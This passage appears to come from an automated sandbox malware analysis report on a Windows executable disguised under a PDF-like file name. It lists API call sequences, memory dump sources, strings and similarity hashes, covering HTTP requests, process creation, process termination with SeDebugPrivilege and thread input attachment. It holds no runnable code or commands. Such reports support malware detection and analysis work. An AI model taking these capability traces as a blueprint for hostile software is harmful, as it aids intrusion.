• GetParent.USER32(?), ref: 0037B9DB
• SendMessageW.USER32(00000000,?,?,00000111), ref: 0037B9DE
Strings
Memory Dump Source
• Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
• Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
Similarity
• API ID: MessageSend$CtrlParent
• String ID: ComboBox$ListBox
• API String ID: 1383977212-1403004172
• Opcode ID: 4b9d29d69c9df2be7b5237759b0b1ca4fb98d755919aa7ffac24673b4296e1fa
• Instruction ID: 03e37f6629e0373f45f9e0a1007a6e04792714ff8ac0730121dd480ca243beef
• Opcode Fuzzy Hash: 4b9d29d69c9df2be7b5237759b0b1ca4fb98d755919aa7ffac24673b4296e1fa
• Instruction Fuzzy Hash: A721B675900108BFDF06ABA4CC85EFEBBB9EF46310F504119F665972E1DB786825DB20
APIs
• SendMessageW.USER32(?,00000186,00000002,00000000), ref: 0037BA73
• GetDlgCtrlID.USER32 ref: 0037BA7E
• GetParent.USER32 ref: 0037BA9A
• SendMessageW.USER32(00000000,?,00000111,?), ref: 0037BA9D
• GetDlgCtrlID.USER32(?), ref: 0037BAA6
• GetParent.USER32(?), ref: 0037BAC2
• SendMessageW.USER32(00000000,?,?,00000111), ref: 0037BAC5
Strings
Memory Dump Source
• Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
• Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
Similarity
• API ID: MessageSend$CtrlParent
• String ID: ComboBox$ListBox
• API String ID: 1383977212-1403004172
• Opcode ID: 31256d9169739137f32a2e54d2b82be0ea53bca2e3db556085af6ae6fad85d28
• Instruction ID: 2fb1f237e8cc8a8156d48e39e6f6677acb3b4b071bbbd4440fa7bfd37e31caf7
• Opcode Fuzzy Hash: 31256d9169739137f32a2e54d2b82be0ea53bca2e3db556085af6ae6fad85d28
• Instruction Fuzzy Hash: 5921C574900108BFDF52AB64CC85FFEBBB9EF45300F504015F955AB1A1DB796926DB20
APIs
• GetParent.USER32 ref: 0037BAE3
• GetClassNameW.USER32(00000000,?,00000100), ref: 0037BAF8
• _wcscmp.LIBCMT ref: 0037BB0A
• SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 0037BB85
Strings
Memory Dump Source
• Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
• Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
Similarity
• API ID: ClassMessageNameParentSend_wcscmp
• String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
• API String ID: 1704125052-3381328864
• Opcode ID: 55bc6d0753a2cbe1817302a8bedbc83a7067ad8bc3ffb5aa183f06d8573eff55
• Instruction ID: 6b9083ba7449aa78859dc530dffbd81aa14e1b75806c8e9011a97dec092bda71
• Opcode Fuzzy Hash: 55bc6d0753a2cbe1817302a8bedbc83a7067ad8bc3ffb5aa183f06d8573eff55
• Instruction Fuzzy Hash: C1110676648307FAFA376624DC07EB7B7AC9B11724F208026FE08E90D9EFA5A8118514
APIs
• VariantInit.OLEAUT32(?), ref: 0039B2D5
• CoInitialize.OLE32(00000000), ref: 0039B302
• CoUninitialize.OLE32 ref: 0039B30C
• GetRunningObjectTable.OLE32(00000000,?), ref: 0039B40C
• SetErrorMode.KERNEL32(00000001,00000029), ref: 0039B539
• CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002), ref: 0039B56D
• CoGetObject.OLE32(?,00000000,003CD91C,?), ref: 0039B590
• SetErrorMode.KERNEL32(00000000), ref: 0039B5A3
• SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 0039B623
• VariantClear.OLEAUT32(003CD91C), ref: 0039B633
Memory Dump Source
• Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
• Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
Similarity
• API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
• String ID:
• API String ID: 2395222682-0
• Opcode ID: e37a87ea73b5d0f0cbea53ce83e804b6fc5b2b85e8a8a608f067330beb236986
• Instruction ID: b872604f87b7b68e653e62c3ff72bc808b18b3cd22d5c024c06f37fcdc284613
• Opcode Fuzzy Hash: e37a87ea73b5d0f0cbea53ce83e804b6fc5b2b85e8a8a608f067330beb236986
• Instruction Fuzzy Hash: A6C12271608301AFCB02DF69D984A2BB7E9BF89308F00491DF98ADB251DB71ED05CB52
APIs
• __lock.LIBCMT ref: 0036ACC1
  • Part of subcall function 00367CF4: __mtinitlocknum.LIBCMT ref: 00367D06
  • Part of subcall function 00367CF4: EnterCriticalSection.KERNEL32(00000000,?,00367ADD,0000000D), ref: 00367D1F
• __calloc_crt.LIBCMT ref: 0036ACD2
  • Part of subcall function 00366986: __calloc_impl.LIBCMT ref: 00366995
  • Part of subcall function 00366986: Sleep.KERNEL32(00000000,000003BC,0035F507,?,0000000E), ref: 003669AC
• @_EH4_CallFilterFunc@8.LIBCMT ref: 0036ACED
• GetStartupInfoW.KERNEL32(?,003F6E28,00000064,00365E91,003F6C70,00000014), ref: 0036AD46
• __calloc_crt.LIBCMT ref: 0036AD91
• GetFileType.KERNEL32(00000001), ref: 0036ADD8
• InitializeCriticalSectionAndSpinCount.KERNEL32(0000000D,00000FA0), ref: 0036AE11
Memory Dump Source
• Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
• Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
Similarity
• API ID: CriticalSection__calloc_crt$CallCountEnterFileFilterFunc@8InfoInitializeSleepSpinStartupType__calloc_impl__lock__mtinitlocknum
• String ID:
• API String ID: 1426640281-0
• Opcode ID: 08fbb81b73af87e912f46505994bb3959535b66de74c1a784bb4484665d63709
• Instruction ID: 60e966e60c3507fc752cf85fe975ad7c0dab8693eb2919f8498db8d830f7bfeb
• Opcode Fuzzy Hash: 08fbb81b73af87e912f46505994bb3959535b66de74c1a784bb4484665d63709
• Instruction Fuzzy Hash: 4881E2B0905B458FDB16CF68C9805A9BBF4AF06324B24826DE4A6BB3D5C7359803CF56
APIs
• GetCurrentThreadId.KERNEL32 ref: 00384047
• GetForegroundWindow.USER32(00000000,?,?,?,?,?,003830A5,?,00000001), ref: 0038405B
• GetWindowThreadProcessId.USER32(00000000), ref: 00384062
• AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,003830A5,?,00000001), ref: 00384071
• GetWindowThreadProcessId.USER32(?,00000000), ref: 00384083
• AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,003830A5,?,00000001), ref: 0038409C
• AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,003830A5,?,00000001), ref: 003840AE
• AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,003830A5,?,00000001), ref: 003840F3
• AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,003830A5,?,00000001), ref: 00384108
• AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,003830A5,?,00000001), ref: 00384113
Memory Dump Source
• Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
• Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
Similarity
• API ID: Thread$AttachInput$Window$Process$CurrentForeground
• String ID:
• API String ID: 2156557900-0
• Opcode ID: 55ba53e8652202f4311a016b9bd6a696f0f45982ce04e60e82582be4323cc074
• Instruction ID: db01b4cbfa3a43262fd29ff21cd2141572917160d64b7822c268ebee9e00bbaa
• Opcode Fuzzy Hash: 55ba53e8652202f4311a016b9bd6a696f0f45982ce04e60e82582be4323cc074
• Instruction Fuzzy Hash: 4631E6B2500305AFEB12EF54DC49F6ABBADFB50312F118065F905E6690DBB4ED80CB64
APIs
• GetSysColor.USER32(00000008), ref: 0035B496
• SetTextColor.GDI32(?,000000FF), ref: 0035B4A0
• SetBkMode.GDI32(?,00000001), ref: 0035B4B5
• GetStockObject.GDI32(00000005), ref: 0035B4BD
• GetClientRect.USER32(?), ref: 003BDD63
• SendMessageW.USER32(?,00001328,00000000,?), ref: 003BDD7A
• GetWindowDC.USER32(?), ref: 003BDD86
• GetPixel.GDI32(00000000,?,?), ref: 003BDD95
• ReleaseDC.USER32(?,00000000), ref: 003BDDA7
• GetSysColor.USER32(00000005), ref: 003BDDC5
Memory Dump Source
• Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
• Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
Similarity
• API ID: Color$ClientMessageModeObjectPixelRectReleaseSendStockTextWindow
• String ID:
• API String ID: 3430376129-0
• Opcode ID: ffbe3b9062de37feb495efaccbc2a033b0e96e0d1d36104ffc5e1588c2146709
• Instruction ID: 6fa54f7b4e912c8fa803427e14a95e88dca12ff8aaf369e4aa1e032f4fbc0a09
• Opcode Fuzzy Hash: ffbe3b9062de37feb495efaccbc2a033b0e96e0d1d36104ffc5e1588c2146709
• Instruction Fuzzy Hash: 23118E71100205EFDB626FA4EC08FE97B69EB05326F158235FA66E50F1CB321951DF20
                                                    APIs
                                                    • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 003430DC
                                                    • CoUninitialize.OLE32(?,00000000), ref: 00343181
                                                    • UnregisterHotKey.USER32(?), ref: 003432A9
                                                    • DestroyWindow.USER32(?), ref: 003B5079
                                                    • FreeLibrary.KERNEL32(?), ref: 003B50F8
                                                    • VirtualFree.KERNEL32(?,00000000,00008000), ref: 003B5125
                                                    Strings
                                                    Similarity
                                                    • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                    • String ID: close all
                                                    • API String ID: 469580280-3243417748
                                                    APIs
                                                    • SetWindowLongW.USER32(?,000000EB), ref: 0035CC15
                                                      • Part of subcall function 0035CCCD: GetClientRect.USER32(?,?), ref: 0035CCF6
                                                      • Part of subcall function 0035CCCD: GetWindowRect.USER32(?,?), ref: 0035CD37
                                                      • Part of subcall function 0035CCCD: ScreenToClient.USER32(?,?), ref: 0035CD5F
                                                    • GetDC.USER32 ref: 003BD137
                                                    • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 003BD14A
                                                    • SelectObject.GDI32(00000000,00000000), ref: 003BD158
                                                    • SelectObject.GDI32(00000000,00000000), ref: 003BD16D
                                                    • ReleaseDC.USER32(?,00000000), ref: 003BD175
                                                    • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 003BD200
                                                    Strings
                                                    Similarity
                                                    • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                    • String ID: U
                                                    • API String ID: 4009187628-3372436214
                                                    APIs
                                                    • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 003945FF
                                                    • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0039462B
                                                    • InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 0039466D
                                                    • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00394682
                                                    • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0039468F
                                                    • HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 003946BF
                                                    • InternetCloseHandle.WININET(00000000), ref: 00394706
                                                      • Part of subcall function 00395052: GetLastError.KERNEL32(?,?,003943CC,00000000,00000000,00000001), ref: 00395067
                                                    Strings
                                                    Similarity
                                                    • API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorHandleInfoLastOpenSend
                                                    • String ID:
                                                    • API String ID: 1241431887-3916222277
                                                    APIs
                                                    • GetModuleFileNameW.KERNEL32(?,?,00000104,?,003DDC00), ref: 0039B715
                                                    • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,003DDC00), ref: 0039B749
                                                    • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 0039B8C1
                                                    • SysFreeString.OLEAUT32(?), ref: 0039B8EB
                                                    Similarity
                                                    • API ID: Free$FileLibraryModuleNamePathQueryStringType
                                                    • String ID:
                                                    • API String ID: 560350794-0
                                                    APIs
                                                    • _memset.LIBCMT ref: 003A24F5
                                                    • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 003A2688
                                                    • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 003A26AC
                                                    • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 003A26EC
                                                    • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 003A270E
                                                    • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 003A286F
                                                    • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 003A28A1
                                                    • CloseHandle.KERNEL32(?), ref: 003A28D0
                                                    • CloseHandle.KERNEL32(?), ref: 003A2947
                                                    Similarity
                                                    • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                                                    • String ID:
                                                    • API String ID: 4090791747-0
                                                    APIs
                                                    • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 003AB3F4
                                                    Similarity
                                                    • API ID: InvalidateRect
                                                    • String ID:
                                                    • API String ID: 634782764-0
                                                    APIs
                                                    • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 003BDB1B
                                                    • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 003BDB3C
                                                    • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 003BDB51
                                                    • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 003BDB6E
                                                    • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 003BDB95
                                                    • DestroyIcon.USER32(00000000,?,?,?,?,?,?,0035A67C,00000000,00000000,00000000,000000FF,00000000,000000FF,000000FF), ref: 003BDBA0
                                                    • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 003BDBBD
                                                    • DestroyIcon.USER32(00000000,?,?,?,?,?,?,0035A67C,00000000,00000000,00000000,000000FF,00000000,000000FF,000000FF), ref: 003BDBC8
                                                    Similarity
                                                    • API ID: Icon$DestroyExtractImageLoadMessageSend
                                                    • String ID:
                                                    • API String ID: 1268354404-0
                                                    APIs
                                                      • Part of subcall function 00386EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00385FA6,?), ref: 00386ED8
                                                      • Part of subcall function 00386EBB: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00385FA6,?), ref: 00386EF1
                                                      • Part of subcall function 003872CB: GetFileAttributesW.KERNEL32(?,00386019), ref: 003872CC
                                                    • lstrcmpiW.KERNEL32(?,?), ref: 003875CA
                                                    • _wcscmp.LIBCMT ref: 003875E2
                                                    • MoveFileW.KERNEL32(?,?), ref: 003875FB
                                                    Similarity
                                                    • API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
                                                    • String ID:
                                                    • API String ID: 793581249-0
                                                    APIs
                                                    • ShowWindow.USER32(00000000,000000FF,00000000,00000000,00000000,?,003BDAD1,00000004,00000000,00000000), ref: 0035EAEB
                                                    • ShowWindow.USER32(00000000,00000000,00000000,00000000,00000000,?,003BDAD1,00000004,00000000,00000000), ref: 0035EB32
                                                    • ShowWindow.USER32(00000000,00000006,00000000,00000000,00000000,?,003BDAD1,00000004,00000000,00000000), ref: 003BDC86
                                                    • ShowWindow.USER32(00000000,000000FF,00000000,00000000,00000000,?,003BDAD1,00000004,00000000,00000000), ref: 003BDCF2
                                                    Similarity
                                                    • API ID: ShowWindow
                                                    • String ID:
                                                    • API String ID: 1268545403-0
                                                    APIs
                                                    • GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,0037AEF1,00000B00,?,?), ref: 0037B26C
                                                    • HeapAlloc.KERNEL32(00000000,?,0037AEF1,00000B00,?,?), ref: 0037B273
                                                    • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,0037AEF1,00000B00,?,?), ref: 0037B288
                                                    • GetCurrentProcess.KERNEL32(?,00000000,?,0037AEF1,00000B00,?,?), ref: 0037B290
                                                    • DuplicateHandle.KERNEL32(00000000,?,0037AEF1,00000B00,?,?), ref: 0037B293
                                                    • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,0037AEF1,00000B00,?,?), ref: 0037B2A3
                                                    • GetCurrentProcess.KERNEL32(0037AEF1,00000000,?,0037AEF1,00000B00,?,?), ref: 0037B2AB
                                                    • DuplicateHandle.KERNEL32(00000000,?,0037AEF1,00000B00,?,?), ref: 0037B2AE
                                                    • CreateThread.KERNEL32(00000000,00000000,0037B2D4,00000000,00000000,00000000), ref: 0037B2C8
                                                    Similarity
                                                    • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                    • String ID:
                                                    • API String ID: 1957940570-0
                                                    Strings
                                                    Similarity
                                                    • API ID:
                                                    • String ID: NULL Pointer assignment$Not an Object type
                                                    • API String ID: 0-572801152
                                                    • Opcode ID: a8dfe5555046fb6ea6e134a374ef79c774670d38a8290586add8e82c10c8ee7d
                                                    • Instruction ID: 1c0f68126f59e6148bdbbc5d388cf45ce5e7997e515cf6e73840af3e97706492
                                                    • Opcode Fuzzy Hash: a8dfe5555046fb6ea6e134a374ef79c774670d38a8290586add8e82c10c8ee7d
                                                    • Instruction Fuzzy Hash: 3FE1F471A1021AAFDF16DFA8C881BEE77B9EF48354F158029F905AB281D770AD41CB90
                                                    APIs
                                                      • Part of subcall function 0034936C: __swprintf.LIBCMT ref: 003493AB
                                                      • Part of subcall function 0034936C: __itow.LIBCMT ref: 003493DF
                                                      • Part of subcall function 0035C6F4: _wcscpy.LIBCMT ref: 0035C717
                                                    • _wcstok.LIBCMT ref: 0039184E
                                                    • _wcscpy.LIBCMT ref: 003918DD
                                                    • _memset.LIBCMT ref: 00391910
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                                                    • String ID: X$p2?l2?
                                                    • API String ID: 774024439-3124981581
                                                    • Opcode ID: 8e7786b734be4175496fcc1418076832c678c136d29933a33ecc2a445feff375
                                                    • Instruction ID: b409f9a5feed45ed348b3fe8d96d162c6c4283995d6df73253c9d81ae0271178
                                                    • Opcode Fuzzy Hash: 8e7786b734be4175496fcc1418076832c678c136d29933a33ecc2a445feff375
                                                    • Instruction Fuzzy Hash: DCC18F355043419FCB66EF24C941AAAB7E4FF85350F00492DF9999F2A2DB70ED05CB82
                                                    APIs
                                                    • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 003A9B19
                                                    • SendMessageW.USER32(?,00001036,00000000,?), ref: 003A9B2D
                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 003A9B47
                                                    • _wcscat.LIBCMT ref: 003A9BA2
                                                    • SendMessageW.USER32(?,00001057,00000000,?), ref: 003A9BB9
                                                    • SendMessageW.USER32(?,00001061,?,0000000F), ref: 003A9BE7
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$Window_wcscat
                                                    • String ID: SysListView32
                                                    • API String ID: 307300125-78025650
                                                    • Opcode ID: 44c146abe3839e6b23257104522742517474a18e507ffa9e0ccc8d7ff41e799d
                                                    • Instruction ID: 79ecea70f87bd235182e258294422b9bff3da515ebbab8c473e112738c4eacbe
                                                    • Opcode Fuzzy Hash: 44c146abe3839e6b23257104522742517474a18e507ffa9e0ccc8d7ff41e799d
                                                    • Instruction Fuzzy Hash: FD41AF71940308AFDB229FA4DC85FEE77A8EF09350F11452AF689EB291D7719D84CB60
                                                    APIs
                                                      • Part of subcall function 00386532: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 00386554
                                                      • Part of subcall function 00386532: Process32FirstW.KERNEL32(00000000,0000022C), ref: 00386564
                                                      • Part of subcall function 00386532: CloseHandle.KERNEL32(00000000,?,00000000), ref: 003865F9
                                                    • OpenProcess.KERNEL32(00000001,00000000,?), ref: 003A179A
                                                    • GetLastError.KERNEL32 ref: 003A17AD
                                                    • OpenProcess.KERNEL32(00000001,00000000,?), ref: 003A17D9
                                                    • TerminateProcess.KERNEL32(00000000,00000000), ref: 003A1855
                                                    • GetLastError.KERNEL32(00000000), ref: 003A1860
                                                    • CloseHandle.KERNEL32(00000000), ref: 003A1895
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                    • String ID: SeDebugPrivilege
                                                    • API String ID: 2533919879-2896544425
                                                    • Opcode ID: f2994f5a32d92065f44ca3fe6a6bf77d012262e440a2110ac58fa5ec0fb926f7
                                                    • Instruction ID: aacd65a432827568298e8bf195032dff39d469a5fe3427902f5ac52ff7c80a61
                                                    • Opcode Fuzzy Hash: f2994f5a32d92065f44ca3fe6a6bf77d012262e440a2110ac58fa5ec0fb926f7
                                                    • Instruction Fuzzy Hash: CC41E175600200AFDB07EF54CC95FAEB7A9EF45700F098098F9069F2D2DB79A904CB91
                                                    APIs
                                                    • LoadIconW.USER32(00000000,00007F03), ref: 003858B8
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: IconLoad
                                                    • String ID: blank$info$question$stop$warning
                                                    • API String ID: 2457776203-404129466
                                                    • Opcode ID: 770d640ef5a6895fd36a089a30e284d0fbed5b96ab4a56c74786120df363ad00
                                                    • Instruction ID: cd4c58f2df22d6563bb6bec1ba97442e5ff6433f8dda4dd2da6fd2a1e6535985
                                                    • Opcode Fuzzy Hash: 770d640ef5a6895fd36a089a30e284d0fbed5b96ab4a56c74786120df363ad00
                                                    • Instruction Fuzzy Hash: 0011D63670DB46FAE7176B549C83DAB779C9F25724F2000BBF611FA281E7B0AA004765
                                                    APIs
                                                    • SafeArrayGetVartype.OLEAUT32(?,00000000), ref: 0038A806
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
